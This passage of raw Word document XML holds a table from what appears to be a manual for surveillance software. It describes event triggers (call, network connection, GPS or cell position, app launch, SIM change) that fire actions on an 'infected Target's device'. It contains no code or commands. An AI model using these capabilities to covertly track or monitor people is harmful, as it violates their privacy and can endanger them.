                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00656D76" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1073" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId240" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1073" DrawAspect="Content" ObjectID="_1446455288" r:id="rId241"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Call</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0069370C" w:rsidP="0069370C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069370C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Call </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="0069370C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="0069370C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ction when a call is made or received</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> by the infected Target’s device.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00BB3F02" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1074" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId81" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1074" DrawAspect="Content" ObjectID="_1446455289" r:id="rId242"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="0018169C" w:rsidP="008E44B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection </w:t>
            </w:r>
            <w:r w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Event triggers an Action </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">as soon as </w:t>
            </w:r>
            <w:r w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>acquires a valid IP address on any</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>network interface (</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. </w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fi, Active</w:t>
            </w:r>
            <w:r w:rsidR="008E44B2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0" w:rsidRPr="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ync, GPRS/3G+), and ter</w:t>
            </w:r>
            <w:r w:rsidR="00C604D0">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>minates the action when all the connections are terminated.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00FD3D68" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1075" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId243" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1075" DrawAspect="Content" ObjectID="_1446455290" r:id="rId244"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Position</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="009A611F" w:rsidP="009A611F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Position </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>reaches or leaves a specific position.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The position can be defined by GPS coordinates and a range or by GSM cell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>information</w:t>
            </w:r>
            <w:r w:rsidRPr="009A611F">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1076" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId85" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1076" DrawAspect="Content" ObjectID="_1446455291" r:id="rId245"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Process</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="00CD39BE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD39BE">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Process Event triggers an Action when a specific application is launched on the infected Target’s device.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="00B863AA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1077" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId246" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1077" DrawAspect="Content" ObjectID="_1446455292" r:id="rId247"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="00CD39BE" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SimChange</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="006530EF" w:rsidP="006530EF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006530EF">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The SimChange </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="006530EF">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vent triggers an action when the SIM card is changed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
